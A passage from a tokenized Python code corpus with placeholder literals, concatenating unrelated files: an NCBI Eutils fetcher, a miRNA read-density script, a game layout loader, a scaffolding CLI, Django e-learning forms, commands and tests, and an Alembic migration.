<EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:100> ] <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:[>" , "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:]>" , "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . replace ( "<STR_LIT:=>" , "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = fastalines [ <NUM_LIT:0> ] . rstrip ( "<STR_LIT:_>" ) <EOL> fastalines [ <NUM_LIT:0> ] = re . sub ( regex , "<STR_LIT:_>" , fastalines [ <NUM_LIT:0> ] ) <EOL> cleanseq = "<STR_LIT:\n>" . 
join ( fastalines ) <EOL> sane_seqlist . append ( cleanseq ) <EOL> self . logger . info ( "<STR_LIT>" % ( len ( sane_seqlist ) ) ) <EOL> return "<STR_LIT:\n>" . join ( sane_seqlist ) <EOL> def get_sequences ( self ) : <EOL> """<STR_LIT>""" <EOL> batch_size = self . retmax_efetch <EOL> count = self . count <EOL> uids_list = self . ids <EOL> self . logger . info ( "<STR_LIT>" % batch_size ) <EOL> self . logger . info ( "<STR_LIT>" % ( ( count / batch_size ) + <NUM_LIT:1> ) ) <EOL> with open ( self . outname , '<STR_LIT:w>' ) as out : <EOL> for start in range ( <NUM_LIT:0> , count , batch_size ) : <EOL> end = min ( count , start + batch_size ) <EOL> batch = uids_list [ start : end ] <EOL> self . epost ( self . dbname , "<STR_LIT:U+002C>" . join ( batch ) ) <EOL> mfasta = '<STR_LIT>' <EOL> while not mfasta : <EOL> self . logger . info ( "<STR_LIT>" % ( ( start / batch_size ) + <NUM_LIT:1> ) ) <EOL> mfasta = self . efetch ( self . dbname , self . query_key , self . webenv ) <EOL> out . write ( mfasta + '<STR_LIT:\n>' ) <EOL> LOG_FORMAT = '<STR_LIT>' <EOL> LOG_DATEFMT = '<STR_LIT>' <EOL> LOG_LEVELS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __main__ ( ) : <EOL> """<STR_LIT>""" <EOL> parser = optparse . OptionParser ( description = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , choices = LOG_LEVELS , default = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> ( options , args ) = parser . parse_args ( ) <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> parser . error ( '<STR_LIT>' ) <EOL> log_level = getattr ( logging , options . 
loglevel ) <EOL> kwargs = { '<STR_LIT>' : LOG_FORMAT , <EOL> '<STR_LIT>' : LOG_DATEFMT , <EOL> '<STR_LIT>' : log_level } <EOL> if options . logfile : <EOL> kwargs [ '<STR_LIT:filename>' ] = options . logfile <EOL> logging . basicConfig ( ** kwargs ) <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> E = Eutils ( options , logger ) <EOL> E . retrieve ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> __main__ ( ) </s>
<s> import sys , subprocess <EOL> from collections import defaultdict <EOL> def get_fasta ( index = "<STR_LIT>" ) : <EOL> p = subprocess . Popen ( args = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:0>" , index ] , stdout = subprocess . PIPE , stderr = subprocess . STDOUT ) <EOL> outputlines = p . stdout . readlines ( ) <EOL> p . wait ( ) <EOL> miR_sequence_liste = { } <EOL> for line in outputlines : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:>>" : <EOL> miR_name = line [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( ) [ <NUM_LIT:0> ] <EOL> else : <EOL> miR_sequence_liste [ miR_name ] = line [ : - <NUM_LIT:1> ] <EOL> return miR_sequence_liste <EOL> class Mirna : <EOL> def __init__ ( self , name , sequence ) : <EOL> self . name = name <EOL> self . sequence = sequence <EOL> self . matched_reads = [ ] <EOL> self . dicmap = { } <EOL> def addread ( self , offset , size ) : <EOL> self . matched_reads . append ( ( offset , size ) ) <EOL> self . dicmap [ ( offset , size ) ] = self . dicmap . get ( ( offset , size ) , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> return <EOL> def mircount ( self ) : <EOL> return len ( self . matched_reads ) <EOL> def density ( self ) : <EOL> '''<STR_LIT>''' <EOL> map = [ <NUM_LIT:0> for i in range ( len ( self . sequence ) ) ] <EOL> for offset , size in self . dicmap : <EOL> for i in range ( offset , offset + size ) : <EOL> map [ i ] += self . dicmap [ ( offset , size ) ] <EOL> return map <EOL> def normalized_density ( self ) : <EOL> map = self . density ( ) <EOL> maximum = float ( max ( map ) ) or <NUM_LIT:1> <EOL> length = float ( len ( map ) ) or <NUM_LIT:1> <EOL> Total_NoR = self . mircount ( ) <EOL> output = [ "<STR_LIT>" ] <EOL> for i , D in enumerate ( map ) : <EOL> output . append ( "<STR_LIT>" % ( self . name , ( i + <NUM_LIT:1> ) / length , D / maximum , Total_NoR ) ) <EOL> return "<STR_LIT:\n>" . join ( output ) <EOL> def hitmap ( self ) : <EOL> output = [ ] <EOL> output . append ( self . name ) <EOL> output . append ( "<STR_LIT>" % ( self . 
sequence , "<STR_LIT>" , "<STR_LIT:size>" , "<STR_LIT>" ) ) <EOL> for pos_size in sorted ( self . dicmap ) : <EOL> seq = self . sequence [ pos_size [ <NUM_LIT:0> ] : pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] ] <EOL> output . append ( "<STR_LIT>" % ( "<STR_LIT:.>" * len ( self . sequence [ : pos_size [ <NUM_LIT:0> ] ] ) , seq , "<STR_LIT:.>" * len ( self . sequence [ pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] : ] ) , pos_size [ <NUM_LIT:0> ] + <NUM_LIT:1> , pos_size [ <NUM_LIT:1> ] , self . dicmap [ pos_size ] ) ) <EOL> return "<STR_LIT:\n>" . join ( output ) <EOL> def splitcount ( self , shift ) : <EOL> median = len ( self . sequence ) / <NUM_LIT:2> <EOL> splitsite = <NUM_LIT:0> <EOL> scores = [ ] <EOL> for i in range ( median - shift , median + shift + <NUM_LIT:1> ) : <EOL> countsum = <NUM_LIT:0> <EOL> for pos_size in self . dicmap : <EOL> if pos_size [ <NUM_LIT:0> ] <= i <= pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] - <NUM_LIT:1> : continue <EOL> else : countsum = countsum + self . dicmap [ pos_size ] <EOL> scores . append ( countsum ) <EOL> firstmax = scores . index ( max ( scores ) ) <EOL> scores . reverse ( ) <EOL> lastmax = scores . index ( max ( scores ) ) <EOL> scores . reverse ( ) <EOL> split_selected = firstmax + len ( scores [ firstmax : - lastmax ] ) / <NUM_LIT:2> + median - shift <EOL> mir5p = <NUM_LIT:0> <EOL> mir3p = <NUM_LIT:0> <EOL> for pos_size in self . dicmap : <EOL> if pos_size [ <NUM_LIT:0> ] <= split_selected <= pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] - <NUM_LIT:1> : continue <EOL> elif split_selected <= pos_size [ <NUM_LIT:0> ] : mir3p = mir3p + self . dicmap [ pos_size ] <EOL> else : mir5p = mir5p + self . dicmap [ pos_size ] <EOL> return "<STR_LIT>" % ( self . name , mir5p , self . name , mir3p ) <EOL> def splitcount_2 ( self , shift ) : <EOL> density_map = self . density ( ) <EOL> median = len ( self . 
sequence ) / <NUM_LIT:2> <EOL> minimum = <NUM_LIT:0> <EOL> densitydic = dict ( [ ( i , density ) for i , density in enumerate ( density_map ) if median - shift <= i <= median + shift ] ) <EOL> revdic = dict ( map ( lambda item : ( item [ <NUM_LIT:1> ] , item [ <NUM_LIT:0> ] ) , densitydic . items ( ) ) ) <EOL> mindensity_offset = revdic [ min ( revdic . keys ( ) ) ] <EOL> mir5p = <NUM_LIT:0> <EOL> mir3p = <NUM_LIT:0> <EOL> for pos_size in self . dicmap : <EOL> if mindensity_offset in range ( pos_size [ <NUM_LIT:0> ] , pos_size [ <NUM_LIT:0> ] + pos_size [ <NUM_LIT:1> ] ) : continue <EOL> if mindensity_offset <= pos_size [ <NUM_LIT:0> ] : mir3p = mir3p + self . dicmap [ pos_size ] <EOL> else : mir5p = mir5p + self . dicmap [ pos_size ] <EOL> return "<STR_LIT>" % ( self . name , mir5p , self . name , mir3p ) <EOL> mirdict = get_fasta ( sys . argv [ <NUM_LIT:2> ] ) <EOL> dicobject = { } <EOL> for mir in mirdict : <EOL> dicobject [ mir ] = Mirna ( mir , mirdict [ mir ] ) <EOL> F = open ( sys . argv [ <NUM_LIT:1> ] , "<STR_LIT:r>" ) <EOL> for line in F : <EOL> fields = line . split ( ) <EOL> name = fields [ <NUM_LIT:1> ] <EOL> offset = int ( fields [ <NUM_LIT:2> ] ) <EOL> sequence = fields [ <NUM_LIT:3> ] <EOL> dicobject [ name ] . addread ( offset , len ( sequence ) ) <EOL> F . close ( ) <EOL> F = open ( sys . argv [ <NUM_LIT:4> ] , "<STR_LIT:w>" ) <EOL> for mir in sorted ( dicobject ) : <EOL> print >> F , dicobject [ mir ] . hitmap ( ) <EOL> for i , counts in enumerate ( dicobject [ mir ] . density ( ) ) : <EOL> print >> F , "<STR_LIT>" % ( i + <NUM_LIT:1> , counts ) <EOL> print >> F <EOL> print >> F , dicobject [ mir ] . normalized_density ( ) <EOL> F . close ( ) <EOL> F = open ( sys . argv [ <NUM_LIT:5> ] , "<STR_LIT:w>" ) <EOL> print >> F , "<STR_LIT>" % sys . argv [ <NUM_LIT:3> ] <EOL> for mir in sorted ( dicobject ) : <EOL> print >> F , dicobject [ mir ] . splitcount_2 ( <NUM_LIT:15> ) </s>
<s> import base64 <EOL> import random <EOL> import zlib <EOL> from . containers import Mesh <EOL> """<STR_LIT>""" <EOL> try : <EOL> from . import __layouts <EOL> except SyntaxError as err : <EOL> print ( "<STR_LIT>" ) <EOL> print ( err ) <EOL> class LayoutEncodingException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def load_layout ( layout_name = None , layout_file = None ) : <EOL> """<STR_LIT>""" <EOL> if layout_name and not layout_file : <EOL> layout_name = layout_name <EOL> layout_string = get_layout_by_name ( layout_name ) <EOL> elif layout_file and not layout_name : <EOL> with open ( layout_file ) as file : <EOL> layout_name = file . name <EOL> layout_string = file . read ( ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return layout_name , layout_string <EOL> def get_random_layout ( filter = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> layouts_names = [ item for item in get_available_layouts ( ) if filter in item ] <EOL> layout_choice = random . choice ( layouts_names ) <EOL> return layout_choice , get_layout_by_name ( layout_choice ) <EOL> def get_available_layouts ( filter = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return [ item for item in dir ( __layouts ) if item . startswith ( '<STR_LIT>' ) and <EOL> filter in item ] <EOL> def get_layout_by_name ( layout_name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return zlib . decompress ( base64 . decodebytes ( __layouts . __dict__ [ layout_name ] . encode ( ) ) ) . decode ( ) <EOL> except KeyError as ke : <EOL> raise ValueError ( "<STR_LIT>" % ke . args ) <EOL> class Layout : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , layout_str , layout_chars , number_bots ) : <EOL> self . number_bots = number_bots <EOL> self . layout_chars = layout_chars <EOL> self . stripped = self . strip_layout ( layout_str ) <EOL> self . check_layout ( self . stripped , self . layout_chars , self . number_bots ) <EOL> self . shape = self . layout_shape ( self . 
stripped ) <EOL> @ staticmethod <EOL> def strip_layout ( layout_str ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:\n>' . join ( [ line . strip ( ) for line in layout_str . split ( '<STR_LIT:\n>' ) ] ) . strip ( ) <EOL> @ staticmethod <EOL> def check_layout ( layout_str , layout_chars , number_bots ) : <EOL> """<STR_LIT>""" <EOL> bot_ids = [ str ( i ) for i in range ( number_bots ) ] <EOL> existing_bots = [ ] <EOL> legal = layout_chars + bot_ids + [ '<STR_LIT:\n>' ] <EOL> for c in layout_str : <EOL> if c not in legal : <EOL> raise LayoutEncodingException ( <EOL> "<STR_LIT>" % c ) <EOL> if c in bot_ids : <EOL> if c in existing_bots : <EOL> raise LayoutEncodingException ( <EOL> "<STR_LIT>" % c ) <EOL> else : <EOL> existing_bots . append ( c ) <EOL> existing_bots . sort ( ) <EOL> if bot_ids != existing_bots : <EOL> missing = [ str ( i ) for i in set ( bot_ids ) . difference ( set ( existing_bots ) ) ] <EOL> missing . sort ( ) <EOL> raise LayoutEncodingException ( <EOL> '<STR_LIT>' <EOL> % ( number_bots , missing ) ) <EOL> lines = layout_str . split ( '<STR_LIT:\n>' ) <EOL> for i in range ( len ( lines ) ) : <EOL> if len ( lines [ i ] ) != len ( lines [ <NUM_LIT:0> ] ) : <EOL> raise LayoutEncodingException ( <EOL> '<STR_LIT>' + '<STR_LIT>' <EOL> % ( i , len ( lines [ i ] ) , len ( lines [ <NUM_LIT:0> ] ) ) ) <EOL> @ staticmethod <EOL> def layout_shape ( layout_str ) : <EOL> """<STR_LIT>""" <EOL> return ( layout_str . find ( '<STR_LIT:\n>' ) , len ( layout_str . split ( '<STR_LIT:\n>' ) ) ) <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> def __str__ ( self ) : <EOL> return self . stripped <EOL> def __repr__ ( self ) : <EOL> return ( "<STR_LIT>" <EOL> % ( self . stripped , self . layout_chars , self . number_bots ) ) <EOL> def as_mesh ( self ) : <EOL> """<STR_LIT>""" <EOL> mesh = Mesh ( * self . shape ) <EOL> mesh . 
_set_data ( list ( '<STR_LIT>' . join ( self . stripped . split ( '<STR_LIT:\n>' ) ) ) ) <EOL> return mesh <EOL> @ classmethod <EOL> def from_file ( cls , filename , layout_chars , number_bots ) : <EOL> """<STR_LIT>""" <EOL> with open ( filename ) as file : <EOL> lines = file . read ( ) <EOL> return cls ( lines , layout_chars = layout_chars , number_bots = number_bots ) </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> from scaffold import projectfolders , projectfiles <EOL> import os <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' , epilog = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , required = True , nargs = <NUM_LIT:1> , help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , required = False , nargs = <NUM_LIT:1> , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> cur_dir = os . getcwd ( ) <EOL> if args . dir != None : <EOL> cur_dir = args . dir [ <NUM_LIT:0> ] <EOL> def main ( ) : <EOL> try : <EOL> projectfolders . create_folders ( args . project [ <NUM_LIT:0> ] , cur_dir ) <EOL> projectfiles . create_files ( args . project [ <NUM_LIT:0> ] , cur_dir ) <EOL> except IOError as e : <EOL> print ( e . strerror ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from django . core . management . base import BaseCommand , CommandError <EOL> from django . conf import settings <EOL> from account . models import Student <EOL> from registrar . models import Course <EOL> from landpage . models import LandpageTopPickCourse <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> """<STR_LIT>""" <EOL> course_list = Course . objects . filter ( status = settings . COURSE_AVAILABLE_STATUS ) <EOL> courses = { } <EOL> for course in course_list : <EOL> count = course . students . count ( ) <EOL> courses [ course . id ] = count <EOL> sorted ( courses . values ( ) ) <EOL> try : <EOL> LandpageTopPickCourse . objects . all ( ) . delete ( ) <EOL> except LandpageTopPickCourse . DoesNotExist : <EOL> pass <EOL> index = <NUM_LIT:1> <EOL> max_count = <NUM_LIT:4> <EOL> for course_id in courses . keys ( ) : <EOL> if index < max_count : <EOL> course_obj = Course . objects . get ( id = course_id ) <EOL> LandpageTopPickCourse . objects . create ( <EOL> id = index , <EOL> course = course_obj , <EOL> ) <EOL> index += <NUM_LIT:1> </s>
<s> from django . core . urlresolvers import resolve <EOL> from django . http import HttpRequest <EOL> from django . http import QueryDict <EOL> from django . test import TestCase <EOL> from django . test import Client <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . auth import authenticate , login , logout <EOL> from django . contrib . auth . decorators import login_required <EOL> import json <EOL> from publisher . models import Publication <EOL> from publisher . views import catalog <EOL> TEST_USER_EMAIL = "<STR_LIT>" <EOL> TEST_USER_USERNAME = "<STR_LIT>" <EOL> TEST_USER_PASSWORD = "<STR_LIT:password>" <EOL> class CatalogTestCase ( TestCase ) : <EOL> def tearDown ( self ) : <EOL> User . objects . get ( email = TEST_USER_EMAIL ) . delete ( ) <EOL> def setUp ( self ) : <EOL> User . objects . create_user ( <EOL> email = TEST_USER_EMAIL , <EOL> username = TEST_USER_USERNAME , <EOL> password = TEST_USER_PASSWORD <EOL> ) <EOL> user = User . objects . get ( email = TEST_USER_EMAIL ) <EOL> def test_url_resolves_to_catalog_page_view ( self ) : <EOL> found = resolve ( '<STR_LIT>' ) <EOL> self . assertEqual ( found . func , catalog . catalog_page ) <EOL> def test_catalog_page_returns_correct_html ( self ) : <EOL> client = Client ( ) <EOL> client . login ( <EOL> username = TEST_USER_USERNAME , <EOL> password = TEST_USER_PASSWORD <EOL> ) <EOL> response = client . post ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) <EOL> self . assertIn ( b'<STR_LIT>' , response . content ) </s>
<s> from django . db import models <EOL> from django import forms <EOL> from django . forms import ModelForm , Textarea , TextInput , NumberInput <EOL> from django . forms . extras . widgets import Select , SelectDateWidget <EOL> from registrar . models import EssaySubmission <EOL> from registrar . models import AssignmentSubmission <EOL> from registrar . models import PeerReview <EOL> from registrar . models import CourseDiscussionThread <EOL> from registrar . models import CourseDiscussionPost <EOL> class EssaySubmissionForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = EssaySubmission <EOL> fields = '<STR_LIT>' <EOL> def clean_file ( self ) : <EOL> upload = self . cleaned_data [ '<STR_LIT:file>' ] <EOL> content_type = upload . content_type <EOL> if content_type in [ '<STR_LIT>' ] : <EOL> if upload . _size <= <NUM_LIT> : <EOL> return upload <EOL> else : <EOL> raise forms . ValidationError ( "<STR_LIT>" ) <EOL> else : <EOL> raise forms . ValidationError ( "<STR_LIT>" ) <EOL> class AssignmentSubmissionForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = AssignmentSubmission <EOL> fields = '<STR_LIT>' <EOL> class PeerReviewForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = PeerReview <EOL> fields = [ '<STR_LIT>' , '<STR_LIT:text>' ] <EOL> labels = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' , <EOL> } <EOL> widgets = { <EOL> '<STR_LIT:text>' : Textarea ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> } <EOL> class CourseDiscussionThreadForm ( forms . 
ModelForm ) : <EOL> class Meta : <EOL> model = CourseDiscussionThread <EOL> fields = [ '<STR_LIT:title>' , '<STR_LIT:text>' ] <EOL> labels = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' , <EOL> } <EOL> widgets = { <EOL> '<STR_LIT:title>' : TextInput ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> '<STR_LIT:text>' : Textarea ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> } <EOL> class CourseDiscussionPostForm ( forms . ModelForm ) : <EOL> class Meta : <EOL> model = CourseDiscussionPost <EOL> fields = [ '<STR_LIT:title>' , '<STR_LIT:text>' ] <EOL> labels = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT:text>' : '<STR_LIT>' , <EOL> } <EOL> widgets = { <EOL> '<STR_LIT:title>' : TextInput ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> '<STR_LIT:text>' : Textarea ( attrs = { '<STR_LIT:class>' : u'<STR_LIT>' , '<STR_LIT>' : u'<STR_LIT>' } ) , <EOL> } </s>
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
import json
from account.models import Teacher
from registrar.models import Course
from registrar.models import CourseDiscussionPost
from registrar.models import CourseDiscussionThread
from teacher.views import discussion

# Credentials for the primary teacher account (owns every fixture below).
TEST_USER_EMAIL = "<STR_LIT>"
TEST_USER_USERNAME = "<STR_LIT>"
TEST_USER_PASSWORD = "<STR_LIT>"
# Credentials for a second teacher used to exercise access control.
TEST_USER_EMAIL2 = "<STR_LIT>"
TEST_USER_USERNAME2 = "<STR_LIT>"
TEST_USER_PASSWORD2 = "<STR_LIT>"


class DiscussionTestCase(TestCase):
    """Integration tests for the teacher discussion views.

    setUp builds two teacher accounts, one course, and one discussion
    thread holding a single post; the tests then drive the discussion and
    posts pages plus the insert/delete endpoints through Django's test
    client and check the rendered HTML or the returned JSON.
    """

    def tearDown(self):
        # Delete courses one by one (the per-instance delete() may do
        # cascading cleanup), then remove every user created in setUp.
        courses = Course.objects.all()
        for course in courses:
            course.delete()
        User.objects.all().delete()

    def setUp(self):
        # Secondary teacher — only used by the "incorrect user" test below.
        User.objects.create_user(
            email=TEST_USER_EMAIL2,
            username=TEST_USER_USERNAME2,
            password=TEST_USER_PASSWORD2
        )
        user = User.objects.get(email=TEST_USER_EMAIL2)
        teacher = Teacher.objects.create(user=user)
        # Primary teacher owning the course, thread and post.
        User.objects.create_user(
            email=TEST_USER_EMAIL,
            username=TEST_USER_USERNAME,
            password=TEST_USER_PASSWORD
        )
        user = User.objects.get(email=TEST_USER_EMAIL)
        teacher = Teacher.objects.create(user=user)
        Course.objects.create(
            id=<NUM_LIT:1>,
            title="<STR_LIT>",
            sub_title="<STR_LIT>",
            category="<STR_LIT>",
            teacher=teacher,
        )
        course = Course.objects.get(id=<NUM_LIT:1>)
        user = User.objects.get(email=TEST_USER_EMAIL)
        # Baseline fixture: one thread with one attached post.
        CourseDiscussionThread.objects.create(
            thread_id=<NUM_LIT:1>,
            title="<STR_LIT>",
            text="<STR_LIT>",
            user=user,
            course=course,
        )
        CourseDiscussionPost.objects.create(
            post_id=<NUM_LIT:1>,
            user=user,
            title='<STR_LIT>',
            text='<STR_LIT>'
        )
        thread = CourseDiscussionThread.objects.get(thread_id=<NUM_LIT:1>)
        post = CourseDiscussionPost.objects.get(post_id=<NUM_LIT:1>)
        thread.posts.add(post)

    def get_logged_in_client(self):
        # Test client authenticated as the primary (owner) teacher.
        client = Client()
        client.login(
            username=TEST_USER_USERNAME,
            password=TEST_USER_PASSWORD
        )
        return client

    def get_logged_in_trudy_client(self):
        # Test client authenticated as the second teacher (non-owner).
        client = Client()
        client.login(
            username=TEST_USER_USERNAME2,
            password=TEST_USER_PASSWORD2
        )
        return client

    def test_url_resolves_to_discussion_page_view(self):
        found = resolve('<STR_LIT>')
        self.assertEqual(found.func, discussion.discussion_page)

    def test_discussion_page_without_thread(self):
        # Remove the fixture thread so the page renders its empty state.
        CourseDiscussionThread.objects.get(
            thread_id=<NUM_LIT:1>
        ).delete()
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertIn(b'<STR_LIT>', response.content)

    def test_discussion_page_with_thread(self):
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertIn(b'<STR_LIT>', response.content)
        self.assertIn(b'<STR_LIT>', response.content)

    def test_threads_table_without_thread(self):
        CourseDiscussionThread.objects.get(
            thread_id=<NUM_LIT:1>
        ).delete()
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT:200>)

    def test_threads_table_with_thread(self):
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertIn(b'<STR_LIT>', response.content)

    def test_new_thread_modal(self):
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertIn(b'<STR_LIT>', response.content)

    def test_insert_thread(self):
        # Start from an empty discussion, then create a thread via POST.
        # The extra kwargs presumably set an AJAX request header on the
        # test client — TODO confirm against the view's requirements.
        CourseDiscussionThread.objects.get(
            thread_id=<NUM_LIT:1>
        ).delete()
        kwargs = {'<STR_LIT>': '<STR_LIT>'}
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>', {
            '<STR_LIT:title>': '<STR_LIT>',
            '<STR_LIT:text>': '<STR_LIT>'
        }, **kwargs)
        json_string = response.content.decode(encoding='<STR_LIT>')
        array = json.loads(json_string)
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertEqual(array['<STR_LIT:message>'], '<STR_LIT>')
        self.assertEqual(array['<STR_LIT:status>'], '<STR_LIT:success>')

    def test_delete_thread_with_thread_and_correct_user(self):
        # The owner may delete their own thread.
        kwargs = {'<STR_LIT>': '<STR_LIT>'}
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>', {
            '<STR_LIT>': <NUM_LIT:1>,
        }, **kwargs)
        json_string = response.content.decode(encoding='<STR_LIT>')
        array = json.loads(json_string)
        self.assertEqual(array['<STR_LIT:status>'], '<STR_LIT:success>')
        self.assertEqual(array['<STR_LIT:message>'], '<STR_LIT>')

    def test_delete_thread_with_empty(self):
        # Deleting a thread that no longer exists must fail gracefully.
        CourseDiscussionThread.objects.all().delete()
        kwargs = {'<STR_LIT>': '<STR_LIT>'}
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>', {
            '<STR_LIT>': <NUM_LIT:1>,
        }, **kwargs)
        json_string = response.content.decode(encoding='<STR_LIT>')
        array = json.loads(json_string)
        self.assertEqual(array['<STR_LIT:status>'], '<STR_LIT>')
        self.assertEqual(array['<STR_LIT:message>'], '<STR_LIT>')

    def test_delete_thread_with_thread_and_incorrect_user(self):
        # A different teacher must not be able to delete the owner's thread.
        kwargs = {'<STR_LIT>': '<STR_LIT>'}
        client = self.get_logged_in_trudy_client()
        response = client.post('<STR_LIT>', {
            '<STR_LIT>': <NUM_LIT:1>,
        }, **kwargs)
        json_string = response.content.decode(encoding='<STR_LIT>')
        array = json.loads(json_string)
        self.assertEqual(array['<STR_LIT:status>'], '<STR_LIT>')
        self.assertEqual(array['<STR_LIT:message>'], '<STR_LIT>')

    def test_url_resolves_to_posts_page_view(self):
        found = resolve('<STR_LIT>')
        self.assertEqual(found.func, discussion.posts_page)

    def test_posts_page(self):
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertIn(b'<STR_LIT>', response.content)
        self.assertIn(b'<STR_LIT>', response.content)

    def test_post_table(self):
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertIn(b'<STR_LIT>', response.content)

    def test_new_post_modal(self):
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>')
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertIn(b'<STR_LIT>', response.content)

    def test_insert_post(self):
        # Recreate a post through the endpoint after removing the fixture.
        CourseDiscussionPost.objects.get(
            post_id=<NUM_LIT:1>
        ).delete()
        kwargs = {'<STR_LIT>': '<STR_LIT>'}
        client = self.get_logged_in_client()
        response = client.post('<STR_LIT>', {
            '<STR_LIT:title>': '<STR_LIT>',
            '<STR_LIT:text>': '<STR_LIT>'
        }, **kwargs)
        json_string = response.content.decode(encoding='<STR_LIT>')
        array = json.loads(json_string)
        self.assertEqual(response.status_code, <NUM_LIT:200>)
        self.assertEqual(array['<STR_LIT:message>'], '<STR_LIT>')
        self.assertEqual(array['<STR_LIT:status>'], '<STR_LIT:success>')
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> branch_labels = None <EOL> depends_on = None <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . rename_table ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . rename_table ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def downgrade ( ) : <EOL> op . rename_table ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . rename_table ( '<STR_LIT>' , '<STR_LIT>' ) </s>
